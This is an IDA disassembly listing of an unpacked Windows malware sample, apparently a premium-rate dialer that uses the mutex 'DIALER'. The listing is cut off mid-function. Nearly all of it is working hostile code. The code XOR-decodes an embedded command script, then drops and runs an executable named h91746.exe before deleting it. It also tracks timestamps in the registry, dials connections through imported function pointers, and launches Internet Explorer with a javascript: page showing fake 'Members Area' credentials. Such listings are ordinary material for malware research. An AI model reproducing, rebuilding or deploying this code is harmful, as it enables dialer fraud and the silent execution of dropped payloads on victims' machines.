;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B610B3E5BA1C41F946788468DECC800B
; File Name : u:\work\b610b3e5ba1c41f946788468decc800b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 6000000
; Section 1. (virtual address 00001000)
; Virtual size : 00001F97 ( 8087.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_code segment para public 'CODE' use32
assume cs:_code
;org 6001000h
assume es:nothing, ss:nothing, ds:_code, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
push 3000h ; dwSize
push 400000h ; lpAddress
call ds:VirtualLock ; VirtualLock
call sub_6002CEB
push offset Name ; "DIALER"
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call ds:CreateMutexA ; CreateMutexA
call ds:GetLastError
cmp eax, 0B7h
jnz short loc_600103F
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_600103F: ; CODE XREF: start+35�j
push 50000h ; dwSize
call sub_6001D3D
test eax, eax
jnz short loc_6001055
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_6001055: ; CODE XREF: start+4B�j
mov edi, eax
call sub_6001946
test eax, eax
jz short loc_6001068
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_6001068: ; CODE XREF: start+5E�j
mov ebp, offset dword_6004000
add ebp, 4
xor ebx, ebx
mov eax, 6Fh
loc_6001077: ; CODE XREF: start+8E�j
xor [ebp+ebx+0], al
cmp byte ptr [ebp+ebx+0], 9
jz short loc_6001090
add eax, 93h
inc ebx
cmp ebx, 1000h
jl short loc_6001077
loc_6001090: ; CODE XREF: start+80�j
mov ebx, edi
add ebx, 400h
mov ds:6003314h, ebx
add ebx, 80h
mov ds:6003318h, ebx
add ebx, 80h
mov ds:600331Ch, ebx
add ebx, 80h
mov ds:6003320h, ebx
add ebx, 80h
mov ds:6003328h, ebx
add ebx, 80h
mov ds:600332Ch, ebx
add ebx, 80h
mov ds:6003330h, ebx
add ebx, 80h
mov ds:6003334h, ebx
add ebx, 80h
mov ds:6003338h, ebx
add ebx, 80h
mov ds:600333Ch, ebx
mov ebx, edi
add ebx, 400h
mov ecx, 200h
xor eax, eax
push edi
add edi, 400h
rep stosd
pop edi
xor ebx, ebx
loc_6001125: ; CODE XREF: start+13C�j start+151�j ...
mov al, [ebp+ebx+0]
cmp al, 1
jnz short loc_600113E
push ebp
push ebx
push dword ptr ds:6003314h
call sub_60017AB
mov ebx, eax
jmp short loc_6001125
; ---------------------------------------------------------------------------
loc_600113E: ; CODE XREF: start+12B�j
cmp al, 2
jnz short loc_6001153
push ebp
push ebx
push dword ptr ds:6003318h
call sub_60017AB
mov ebx, eax
jmp short loc_6001125
; ---------------------------------------------------------------------------
loc_6001153: ; CODE XREF: start+140�j
cmp al, 3
jnz short loc_6001168
push ebp
push ebx
push dword ptr ds:600331Ch
call sub_60017AB
mov ebx, eax
jmp short loc_6001125
; ---------------------------------------------------------------------------
loc_6001168: ; CODE XREF: start+155�j
cmp al, 4
jnz short loc_600117D
push ebp
push ebx
push dword ptr ds:6003320h
call sub_60017AB
mov ebx, eax
jmp short loc_6001125
; ---------------------------------------------------------------------------
loc_600117D: ; CODE XREF: start+16A�j
cmp al, 5
jnz short loc_60011DF
push ebx
call sub_600183B
test eax, eax
jnz short loc_60011D9
mov dword ptr ds:6003340h, 0
mov ebx, edi
add ebx, 20400h
push dword ptr ds:600331Ch
push dword ptr ds:6003318h
push dword ptr ds:6003314h
push 1FC00h
push ebx
call sub_60024DA
pop ebx
test eax, eax
jnz loc_6001500
cmp dword ptr ds:600335Bh, 0F4240h
jl short loc_60011D4
call sub_60018DF
loc_60011D4: ; CODE XREF: start+1CD�j
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_60011D9: ; CODE XREF: start+189�j
pop ebx
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_60011DF: ; CODE XREF: start+17F�j
cmp al, 6
jnz short loc_60011F7
push ebx
push dword ptr [ebp+ebx+1] ; dwMilliseconds
call ds:Sleep ; Sleep
pop ebx
add ebx, 4
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_60011F7: ; CODE XREF: start+1E1�j
cmp al, 7
jnz short loc_600120D
mov edx, [ebp+ebx+1]
mov ds:6003324h, edx
add ebx, 4
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_600120D: ; CODE XREF: start+1F9�j
cmp al, 8
jnz short loc_6001268
mov edx, [ebp+ebx+1]
mov ecx, [ebp+ebx+5]
add edx, edi
add edx, 400h
push ebx
push edx
push ecx
push 200h ; uSize
push edi ; lpBuffer
call sub_6001D0B
push offset aH91746_exe ; "\\h91746.exe"
push edi
call sub_6001C69
pop ecx
pop edx
push 0 ; int
push 0 ; int
push ecx ; nNumberOfBytesToWrite
push edx ; lpBuffer
push edi ; lpFileName
call sub_6001D55
push 1B7740h ; dwMilliseconds
push 0 ; int
push edi ; int
call sub_6001DEB
push edi ; lpFileName
call ds:DeleteFileA ; DeleteFileA
pop ebx
add ebx, 8
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_6001268: ; CODE XREF: start+20F�j
cmp al, 0Ah
jnz short loc_60012B3
mov byte ptr ds:6003363h, 0
mov edx, [ebp+ebx+1]
mov ds:600335Bh, edx
mov edx, [ebp+ebx+5]
mov ds:600335Fh, edx
add ebx, 8
push eax
mov eax, ds:600335Bh
test eax, 0FFFFFFC0h
jnz short loc_60012AD
test eax, 0FFFFFF08h
jz short loc_60012A5
mov byte ptr ds:6003363h, 1
loc_60012A5: ; CODE XREF: start+29C�j
and eax, 7
mov ds:600335Bh, eax
loc_60012AD: ; CODE XREF: start+295�j
pop eax
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_60012B3: ; CODE XREF: start+26A�j
cmp al, 14h
jnz short loc_60012CB
push ebp
push ebx
push dword ptr ds:600332Ch
call sub_60017AB
mov ebx, eax
jmp loc_6001125
; ---------------------------------------------------------------------------
loc_60012CB: ; CODE XREF: start+2B5�j
cmp al, 15h
jnz short loc_60012E3
push ebp
push ebx
push dword ptr ds:6003330h
call sub_60017AB
mov ebx, eax
jmp loc_6001125
; ---------------------------------------------------------------------------
loc_60012E3: ; CODE XREF: start+2CD�j
cmp al, 16h
jnz short loc_600132A
push ebx
call sub_600183B
test eax, eax
jnz short loc_6001324
mov ebx, edi
add ebx, 20400h
push dword ptr ds:600331Ch
push dword ptr ds:6003318h
push dword ptr ds:6003314h
push 1FC00h
push ebx
call sub_60024DA
pop ebx
test eax, eax
jnz loc_6001428
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_6001324: ; CODE XREF: start+2EF�j
pop ebx
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_600132A: ; CODE XREF: start+2E5�j
cmp al, 17h
jnz short loc_600134F
push ebp
push ebx
push dword ptr ds:6003328h
call sub_60017AB
mov ebx, eax
push ebx
push dword ptr ds:6003328h
call sub_6001675
pop ebx
jmp loc_6001125
; ---------------------------------------------------------------------------
loc_600134F: ; CODE XREF: start+32C�j
cmp al, 18h
jnz short loc_6001367
push ebp
push ebx
push dword ptr ds:6003334h
call sub_60017AB
mov ebx, eax
jmp loc_6001125
; ---------------------------------------------------------------------------
loc_6001367: ; CODE XREF: start+351�j
cmp al, 19h
jnz short loc_600137F
push ebp
push ebx
push dword ptr ds:6003338h
call sub_60017AB
mov ebx, eax
jmp loc_6001125
; ---------------------------------------------------------------------------
loc_600137F: ; CODE XREF: start+369�j
cmp al, 1Ah
jnz short loc_6001397
push ebp
push ebx
push dword ptr ds:600333Ch
call sub_60017AB
mov ebx, eax
jmp loc_6001125
; ---------------------------------------------------------------------------
loc_6001397: ; CODE XREF: start+381�j
cmp al, 1Bh
jnz short loc_60013FF
push ebx
push edx
mov edx, ds:6003338h
cmp byte ptr [edx], 0
jz short loc_60013FB
mov ebx, edi
add ebx, 20400h
push ebx
push 20000h
push ebx
push edx
call sub_6001EDA
test eax, eax
jnz short loc_60013C4
pop ebx
jmp short loc_60013FB
; ---------------------------------------------------------------------------
loc_60013C4: ; CODE XREF: start+3BF�j
push eax
push 200h ; uSize
push edi ; lpBuffer
call sub_6001D0B
push offset aH91746_exe ; "\\h91746.exe"
push edi
call sub_6001C69
pop eax
pop ebx
push 0 ; int
push 0 ; int
push eax ; nNumberOfBytesToWrite
push ebx ; lpBuffer
push edi ; lpFileName
call sub_6001D55
mov edx, ds:600333Ch
push 0 ; dwMilliseconds
push edx ; int
push edi ; int
call sub_6001DEB
loc_60013FB: ; CODE XREF: start+3A6�j start+3C2�j
pop edx
pop ebx
jmp short loc_6001413
; ---------------------------------------------------------------------------
loc_60013FF: ; CODE XREF: start+399�j
cmp al, 22h
jnz short loc_6001411
mov edx, 600334Bh
mov byte ptr [edx], 58h
mov byte ptr [edx+1], 33h
jmp short loc_6001413
; ---------------------------------------------------------------------------
loc_6001411: ; CODE XREF: start+401�j
jmp short loc_6001420
; ---------------------------------------------------------------------------
loc_6001413: ; CODE XREF: start:loc_60011D4�j
; start+1DA�j ...
inc ebx
cmp ebx, 1000h
jl loc_6001125
loc_6001420: ; CODE XREF: start:loc_6001411�j
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_6001428: ; CODE XREF: start+319�j
push ebx
call sub_60018DF
mov esi, edi
add esi, 800h
push offset aJavascriptHtml ; "javascript:'<html><head><title>Members "...
push esi
call sub_6001BED
push dword ptr ds:600332Ch
push esi
call sub_6001C69
push offset aBBrYourPasswor ; "</b><br>Your PASSWORD is: <b>"
push esi
call sub_6001C69
push dword ptr ds:6003330h
push esi
call sub_6001C69
push offset aBBrMembersArea ; "</b><br>Members Area URL: <a href=\""
push esi
call sub_6001C69
push dword ptr ds:6003320h
push esi
call sub_6001C69
push offset asc_6001B53 ; "\">"
push esi
call sub_6001C69
push dword ptr ds:6003320h
push esi
call sub_6001C69
push offset aABrBrToAccessU ; "</a><br><br>To access use your usual co"...
push esi
call sub_6001C69
push esi
call sub_6001675
push dword ptr ds:6003334h
push esi
call sub_6001BED
cmp byte ptr [esi], 0
jz short loc_60014F5
push offset asc_6001BA5 ; "-"
push esi
call sub_6001C69
push dword ptr ds:6003314h
push esi
call sub_6001C69
push offset asc_6001BA5 ; "-"
push esi
call sub_6001C69
push dword ptr ds:6003318h
push esi
call sub_6001C69
mov eax, edi
add eax, 1000h
push 200h
push eax
push esi
call sub_6001EDA
loc_60014F5: ; CODE XREF: start+4B2�j
call sub_600158F
pop ebx
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_6001500: ; CODE XREF: start+1BD�j
push ebp
push ebx
call sub_60018DF
push dword ptr ds:6003320h
call sub_6001675
mov esi, edi
add esi, 800h
push dword ptr ds:6003334h
push esi
call sub_6001BED
cmp byte ptr [esi], 0
jz short loc_600156C
push offset asc_6001BA5 ; "-"
push esi
call sub_6001C69
push dword ptr ds:6003314h
push esi
call sub_6001C69
push offset asc_6001BA5 ; "-"
push esi
call sub_6001C69
push dword ptr ds:6003318h
push esi
call sub_6001C69
mov eax, edi
add eax, 1000h
push 200h
push eax
push esi
call sub_6001EDA
loc_600156C: ; CODE XREF: start+529�j
call sub_600158F
test eax, eax
jz short loc_6001587
push 0BB8h ; dwMilliseconds
call ds:Sleep ; Sleep
pop ebx
pop ebp
jmp loc_6001413
; ---------------------------------------------------------------------------
loc_6001587: ; CODE XREF: start+573�j
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
start endp
; =============== S U B R O U T I N E =======================================
sub_600158F proc near ; CODE XREF: start:loc_60014F5�p
; start:loc_600156C�p
cmp dword ptr ds:6003324h, 0E10h
jg short loc_60015F1
cmp dword ptr ds:60031E8h, 0
jz short loc_60015F1
cmp dword ptr ds:6003340h, 0
jz short loc_60015F1
mov eax, 3Ch
push eax
call sub_60015F4
cmp eax, 1
jnz short loc_60015DD
cmp dword ptr ds:6003324h, 0
jz short loc_60015F1
mov eax, ds:6003324h
sub eax, 3Ch
push eax
call sub_60015F4
jmp short $+2
mov ebx, 0
jmp short loc_60015E2
; ---------------------------------------------------------------------------
loc_60015DD: ; CODE XREF: sub_600158F+2C�j
mov ebx, 1
loc_60015E2: ; CODE XREF: sub_600158F+4C�j
push ebx
push dword ptr ds:6003340h
call dword ptr ds:60031E8h
pop eax
retn
; ---------------------------------------------------------------------------
loc_60015F1: ; CODE XREF: sub_600158F+A�j
; sub_600158F+13�j ...
xor eax, eax
retn
sub_600158F endp
; =============== S U B R O U T I N E =======================================
sub_60015F4 proc near ; CODE XREF: sub_600158F+24�p
; sub_600158F+40�p
arg_0 = dword ptr 4
push 0 ; lpName
push 0 ; bInitialState
push 1 ; bManualReset
push 0 ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
test eax, eax
jz short loc_600166D
push eax
push 2
push eax
push dword ptr ds:6003340h
call dword ptr ds:60031F0h
test eax, eax
jz short loc_6001633
pop eax
push eax ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_600166D
; ---------------------------------------------------------------------------
loc_6001633: ; CODE XREF: sub_60015F4+33�j
pop ebx
mov eax, [esp+arg_0]
mov ecx, 3E8h
mul ecx
push ebx
push eax ; dwMilliseconds
push ebx ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
pop ebx
push eax
push ebx ; hObject
call ds:CloseHandle ; CloseHandle
pop eax
cmp eax, 102h
jz short loc_6001665
test eax, eax
jnz short loc_600166D
mov eax, 0
retn 4
; ---------------------------------------------------------------------------
loc_6001665: ; CODE XREF: sub_60015F4+63�j
mov eax, 1
retn 4
; ---------------------------------------------------------------------------
loc_600166D: ; CODE XREF: sub_60015F4+1C�j
; sub_60015F4+3D�j ...
mov eax, 2
retn 4
sub_60015F4 endp
; =============== S U B R O U T I N E =======================================
sub_6001675 proc near ; CODE XREF: start+344�p start+49E�p ...
arg_0 = dword ptr 4
lea esi, [edi+8]
cmp dword ptr ds:60031F4h, 0
jz short loc_60016E3
cmp dword ptr ds:60031FCh, 0
jz short loc_60016E3
cmp dword ptr ds:6003200h, 0
jz short loc_60016E3
push edi
push offset aApplicationsIe ; "Applications\\iexplore.exe\\shell\\open\\co"...
push 80000000h
call dword ptr ds:60031F4h
test eax, eax
jnz short loc_60016E3
mov dword ptr [edi+4], 100h
lea ebx, [edi+4]
push ebx
push esi
push 0
push 0
push 0
push dword ptr [edi]
call dword ptr ds:6003200h
test eax, eax
jz short loc_60016D9
push dword ptr [edi]
call dword ptr ds:60031FCh
jmp short loc_60016E3
; ---------------------------------------------------------------------------
loc_60016D9: ; CODE XREF: sub_6001675+58�j
push dword ptr [edi]
call dword ptr ds:60031FCh
jmp short loc_60016EE
; ---------------------------------------------------------------------------
loc_60016E3: ; CODE XREF: sub_6001675+A�j
; sub_6001675+13�j ...
push offset aCProgra1Intern ; "c:\\progra~1\\intern~1\\iexplore.exe %1"
push esi
call sub_6001BED
loc_60016EE: ; CODE XREF: sub_6001675+6C�j
push 25h
push esi
call sub_6001C39
test eax, eax
jz short loc_6001708
mov byte ptr [eax], 0
loc_60016FD: ; CODE XREF: sub_6001675+91�j
dec eax
cmp byte ptr [eax], 20h
jz short loc_6001708
mov byte ptr [eax], 0
jmp short loc_60016FD
; ---------------------------------------------------------------------------
loc_6001708: ; CODE XREF: sub_6001675+83�j
; sub_6001675+8C�j
mov eax, [esp+arg_0]
push 0 ; dwMilliseconds
push eax ; int
push esi ; int
call sub_6001DEB
retn 4
sub_6001675 endp
; ---------------------------------------------------------------------------
push ebp
mov edx, [esp+8]
push ebx
mov ebx, esp
xor eax, eax
push ebx
push edx
push 80000002h
call dword ptr ds:600320Ch
pop ebx
test eax, eax
jnz short loc_60017A3
mov edx, [esp+0Ch]
push edx
call sub_6001C23
inc eax
mov ecx, eax
push ecx
push edx
push 1
push 0
push 0
push ebx
call dword ptr ds:60031F8h
test eax, eax
jnz short loc_60017A3
mov edx, [esp+10h]
push edx
call sub_6001C23
test eax, eax
jz short loc_6001796
mov edx, [esp+14h]
push edx
call sub_6001C23
inc eax
mov ecx, eax
mov eax, [esp+10h]
jz short loc_6001796
push ecx
push edx
push 1
push 0
push eax
push ebx
call dword ptr ds:60031F8h
test eax, eax
jnz short loc_60017A3
loc_6001796: ; CODE XREF: .code:06001769�j
; .code:0600177C�j
push ebx
call dword ptr ds:60031FCh
test eax, eax
jnz short loc_60017A3
jmp short $+2
loc_60017A3: ; CODE XREF: .code:06001732�j
; .code:0600175B�j ...
pop ebp
retn 10h
; ---------------------------------------------------------------------------
align 4
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_60017AB proc near ; CODE XREF: start+135�p start+14A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebp
mov ebp, [esp+4+arg_8]
mov ebx, [esp+4+arg_4]
mov edx, [esp+4+arg_0]
inc ebx
loc_60017B9: ; CODE XREF: sub_60017AB+1A�j
mov al, [ebp+ebx+0]
test al, al
jz short loc_60017C7
mov [edx], al
inc edx
inc ebx
jmp short loc_60017B9
; ---------------------------------------------------------------------------
loc_60017C7: ; CODE XREF: sub_60017AB+14�j
inc ebx
mov [edx], al
mov eax, ebx
pop ebp
retn 0Ch
sub_60017AB endp
; =============== S U B R O U T I N E =======================================
sub_60017D0 proc near ; CODE XREF: sub_600183B�p sub_60018DF�p ...
push eax
mov eax, esp
push eax
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call dword ptr ds:60031F4h
test eax, eax
jz short loc_60017EC
pop eax
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_60017EC: ; CODE XREF: sub_60017D0+16�j
pop eax
retn
sub_60017D0 endp
; ---------------------------------------------------------------------------
aVtimetimestamp db 'VTimeTimestamp',0 ; DATA XREF: sub_600183B+13�o
; sub_60018DF+2A�o
aRtimestamp db 'RTimestamp',0 ; DATA XREF: sub_6001946+33�o
; sub_6001946+81�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0
; DATA XREF: sub_60017D0+4�o
; =============== S U B R O U T I N E =======================================
sub_600183B proc near ; CODE XREF: start+182�p start+2E8�p
var_8 = byte ptr -8
var_4 = byte ptr -4
call sub_60017D0
test eax, eax
jnz short loc_6001845
retn
; ---------------------------------------------------------------------------
loc_6001845: ; CODE XREF: sub_600183B+7�j
push eax
push eax
push 4
push eax
push eax
push offset aVtimetimestamp ; "VTimeTimestamp"
push edi
call sub_6001BED
push 600335Fh
push edi
call sub_6001C69
pop eax
mov ebx, esp
lea ecx, [esp+0Ch+var_8]
lea edx, [esp+0Ch+var_4]
push ecx
push edx
push ebx
push 0
push edi
push eax
call dword ptr ds:6003200h
test eax, eax
jnz short loc_60018B7
call sub_6002C32
mov edx, ecx
pop ecx
pop ecx
pop ecx
cmp dword ptr ds:600335Bh, 2
jz short loc_60018A5
cmp dword ptr ds:600335Bh, 1
jnz short loc_60018AB
cmp ebx, ecx
jz short loc_60018D3
jmp short loc_60018BA
; ---------------------------------------------------------------------------
loc_60018A5: ; CODE XREF: sub_600183B+59�j
cmp edx, ecx
jz short loc_60018D3
jmp short loc_60018BA
; ---------------------------------------------------------------------------
loc_60018AB: ; CODE XREF: sub_600183B+62�j
sub eax, ecx
cmp eax, ds:600335Bh
jl short loc_60018D3
jmp short loc_60018BA
; ---------------------------------------------------------------------------
loc_60018B7: ; CODE XREF: sub_600183B+46�j
pop eax
pop eax
pop eax
loc_60018BA: ; CODE XREF: sub_600183B+68�j
; sub_600183B+6E�j ...
pop eax
push eax
call dword ptr ds:60031FCh
cmp byte ptr ds:6003363h, 1
jnz short loc_60018D0
call sub_60018DF
loc_60018D0: ; CODE XREF: sub_600183B+8E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_60018D3: ; CODE XREF: sub_600183B+66�j
; sub_600183B+6C�j ...
pop eax
push eax
call dword ptr ds:60031FCh
xor eax, eax
inc eax
retn
sub_600183B endp
; =============== S U B R O U T I N E =======================================
sub_60018DF proc near ; CODE XREF: start+1CF�p start+429�p ...
call sub_60017D0
test eax, eax
jnz short loc_60018E9
retn
; ---------------------------------------------------------------------------
loc_60018E9: ; CODE XREF: sub_60018DF+7�j
push eax
push eax
call sub_6002C32
cmp dword ptr ds:600335Bh, 2
jnz short loc_60018FD
mov eax, ecx
jmp short loc_6001908
; ---------------------------------------------------------------------------
loc_60018FD: ; CODE XREF: sub_60018DF+18�j
cmp dword ptr ds:600335Bh, 1
jnz short loc_6001908
mov eax, ebx
loc_6001908: ; CODE XREF: sub_60018DF+1C�j
; sub_60018DF+25�j
push eax
push offset aVtimetimestamp ; "VTimeTimestamp"
push edi
call sub_6001BED
push 600335Fh
push edi
call sub_6001C69
pop eax
pop ebx
push eax
mov ecx, esp
push 4
push ecx
push 4
push 0
push edi
push ebx
call dword ptr ds:60031F8h
pop eax
pop eax
push eax
call dword ptr ds:60031FCh
retn
sub_60018DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6001946 proc near ; CODE XREF: start+57�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
call sub_60017D0
test eax, eax
jnz short loc_6001956
retn
; ---------------------------------------------------------------------------
loc_6001956: ; CODE XREF: sub_6001946+D�j
mov [ebp+var_4], eax
call sub_6002C32
mov [ebp+var_8], eax
mov [ebp+var_14], 4
lea ebx, [ebp+var_10]
lea edx, [ebp+var_C]
lea ecx, [ebp+var_14]
push ecx
push edx
push ebx
push 0
push offset aRtimestamp ; "RTimestamp"
push [ebp+var_4]
call dword ptr ds:6003200h
test eax, eax
jnz short loc_60019A4
cmp [ebp+var_10], 4
jnz short loc_60019A4
mov ebx, [ebp+var_C]
mov eax, [ebp+var_8]
cmp eax, ebx
jle short loc_60019D9
sub eax, ebx
cmp eax, 0F3Ch
jle short loc_60019A9
loc_60019A4: ; CODE XREF: sub_6001946+43�j
; sub_6001946+49�j
mov eax, [ebp+var_8]
jmp short loc_60019B1
; ---------------------------------------------------------------------------
loc_60019A9: ; CODE XREF: sub_6001946+5C�j
mov eax, [ebp+var_8]
add eax, 0A8C0h
loc_60019B1: ; CODE XREF: sub_6001946+61�j
mov [ebp+var_10], eax
lea ebx, [ebp+var_10]
push 4
push ebx
push 4
push 0
push offset aRtimestamp ; "RTimestamp"
push [ebp+var_4]
call dword ptr ds:60031F8h
xor eax, eax
jmp short loc_60019DE
; ---------------------------------------------------------------------------
loc_60019D9: ; CODE XREF: sub_6001946+53�j
mov eax, 1
loc_60019DE: ; CODE XREF: sub_6001946+91�j
push eax
push [ebp+var_4]
call dword ptr ds:60031FCh
pop eax
mov esp, ebp
pop ebp
retn
sub_6001946 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
aCProgra1Intern db 'c:\progra~1\intern~1\iexplore.exe %1',0
; DATA XREF: sub_6001675:loc_60016E3�o
aApplicationsIe db 'Applications\iexplore.exe\shell\open\command',0
; DATA XREF: sub_6001675+1F�o
aH91746_exe db '\h91746.exe',0 ; DATA XREF: start+22F�o start+3D0�o
aJavascriptHtml db 'javascript:',27h,'<html><head><title>Members Area Access</title></he'
; DATA XREF: start+436�o
db 'ad><body><big><center><br><br>Save the login and password generat'
db 'ed for you. It will grant access for 7 days.<br><br>Your LOGIN is'
db ': <b>',0
aBBrYourPasswor db '</b><br>Your PASSWORD is: <b>',0 ; DATA XREF: start+44D�o
aBBrMembersArea db '</b><br>Members Area URL: <a href="',0 ; DATA XREF: start+464�o
asc_6001B53 db '">',0 ; DATA XREF: start+47B�o
aABrBrToAccessU db '</a><br><br>To access use your usual connection.</center></big></'
; DATA XREF: start+492�o
db 'body></html>',27h,0
asc_6001BA5 db '-',0 ; DATA XREF: start+4B4�o start+4CB�o ...
; char Name[]
Name db 'DIALER',0 ; DATA XREF: start+15�o
; =============== S U B R O U T I N E =======================================
sub_6001BAE proc near ; CODE XREF: sub_6002289+74�p
; sub_600231F+110�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
pushf
cld
mov edi, [esp+0Ch+arg_0]
mov esi, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
rep movsb
lea eax, [edi-1]
popf
pop edi
pop esi
retn 0Ch
sub_6001BAE endp
; =============== S U B R O U T I N E =======================================
sub_6001BC9 proc near ; CODE XREF: sub_6001BED+D�p
; sub_6001C54+E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
pushf
cld
mov edi, [esp+0Ch+arg_0]
mov esi, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
loc_6001BD9: ; CODE XREF: sub_6001BC9+16�j
lodsb
test al, al
jz short loc_6001BE1
stosb
loop loc_6001BD9
loc_6001BE1: ; CODE XREF: sub_6001BC9+13�j
xor eax, eax
stosb
lea eax, [edi-1]
popf
pop edi
pop esi
retn 0Ch
sub_6001BC9 endp
; =============== S U B R O U T I N E =======================================
sub_6001BED proc near ; CODE XREF: start+43C�p start+4AA�p ...
arg_8 = dword ptr 0Ch
pop edx
mov ebx, [esp-4+arg_8]
mov [esp-4+arg_8], 7FFFFFFFh
call sub_6001BC9
push ebx
jmp edx
sub_6001BED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_6001C02 proc near ; CODE XREF: sub_6001C23+A�p
; sub_6001C39+13�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
pushf
cld
mov edi, [esp+8+arg_0]
mov eax, [esp+8+arg_4]
mov ecx, [esp+8+arg_8]
repne scasb
test ecx, ecx
jz short loc_6001C1C
lea eax, [edi-1]
jmp short loc_6001C1E
; ---------------------------------------------------------------------------
loc_6001C1C: ; CODE XREF: sub_6001C02+13�j
xor eax, eax
loc_6001C1E: ; CODE XREF: sub_6001C02+18�j
popf
pop edi
retn 0Ch
sub_6001C02 endp
; =============== S U B R O U T I N E =======================================
sub_6001C23 proc near ; CODE XREF: .code:06001739�p
; .code:06001762�p ...
arg_0 = dword ptr 4
xor eax, eax
dec eax
push eax
inc eax
push eax
push [esp+8+arg_0]
call sub_6001C02
sub eax, [esp+arg_0]
retn 4
sub_6001C23 endp
; =============== S U B R O U T I N E =======================================
sub_6001C39 proc near ; CODE XREF: sub_6001675+7C�p
; sub_6001FD5+4E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_0]
call sub_6001C23
inc eax
push eax
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_6001C02
retn 8
sub_6001C39 endp
; =============== S U B R O U T I N E =======================================
sub_6001C54 proc near ; CODE XREF: sub_6001C69+C�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_6001C23
add [esp+arg_0], eax
pop ebx
call sub_6001BC9
jmp ebx
sub_6001C54 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_6001C69 proc near ; CODE XREF: start+235�p start+3D6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
dec eax
push eax
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_6001C54
retn 8
sub_6001C69 endp
; =============== S U B R O U T I N E =======================================
sub_6001C7D proc near ; CODE XREF: sub_6001CA3+27�p
; sub_600231F+E4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
pushf
cld
mov esi, [esp+0Ch+arg_0]
mov edi, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
xor eax, eax
test eax, eax
repe cmpsb
ja short loc_6001C99
jb short loc_6001C9C
jmp short loc_6001C9D
; ---------------------------------------------------------------------------
loc_6001C99: ; CODE XREF: sub_6001C7D+16�j
inc eax
jmp short loc_6001C9D
; ---------------------------------------------------------------------------
loc_6001C9C: ; CODE XREF: sub_6001C7D+18�j
dec eax
loc_6001C9D: ; CODE XREF: sub_6001C7D+1A�j
; sub_6001C7D+1D�j
popf
pop edi
pop esi
retn 0Ch
sub_6001C7D endp
; =============== S U B R O U T I N E =======================================
sub_6001CA3 proc near ; CODE XREF: sub_6001CD1+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
call sub_6001C23
cmp eax, [esp+arg_8]
jge short loc_6001CB6
mov [esp+arg_8], eax
loc_6001CB6: ; CODE XREF: sub_6001CA3+D�j
push [esp+arg_4]
call sub_6001C23
cmp eax, [esp+arg_8]
jge short loc_6001CC9
mov [esp+arg_8], eax
loc_6001CC9: ; CODE XREF: sub_6001CA3+20�j
pop ebx
call sub_6001C7D
jmp ebx
sub_6001CA3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_6001CD1 proc near ; CODE XREF: sub_6002681+CD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
